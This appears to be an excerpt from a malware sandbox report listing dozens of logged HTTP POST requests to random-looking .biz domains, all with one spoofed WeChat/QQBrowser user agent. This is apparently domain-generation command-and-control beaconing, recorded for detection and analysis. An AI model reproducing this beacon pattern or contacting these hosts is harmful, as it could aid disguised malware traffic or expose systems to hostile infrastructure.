                            Source: global trafficHTTP traffic detected: POST /mvgpsfdcrvitryo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /rrba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ajvaopkagn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ojwgmwlrsgrxkodi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xecqerkyvkn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ysrvxblocwefk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xkjanqfjaocn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xylpjhgrvuhkfdao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /pkabvaplwbiqx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dmaeaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /vpujdohccl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /gocchgnxicko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mnoqnjatopaha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hqlbcdtcv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /fymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wbpbmvhlbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qohnd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dvejgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kadnnjikurdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /mngdwptvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qqxxgql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sgbnffiuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /jae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sptkirsqxflbf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /iafrakxbkhxwqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ucrfyypmempwn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /oiwersrybt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ocntklkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ndgx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /libobglfegsxaj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dkwdmdeuhpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /khpdqtysqhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /icltfkrjatd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xnxlkgkrmwlxblkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /hisgijrksnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /skpx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wgcbdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sxrtljpowkklyfep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ksvtsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /thacrmsw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /rdoagulou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /jk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kjqwmlcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /uluonacniewnep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /vpbxgqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hqowbucy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ohp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wkqumdvynqwto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /npjswmwoxwkrbxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kfodjblu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hdqasqyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qtuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vnjrxnyhwihcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dokmgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vqtoaeha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /lkirwmgfxelvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
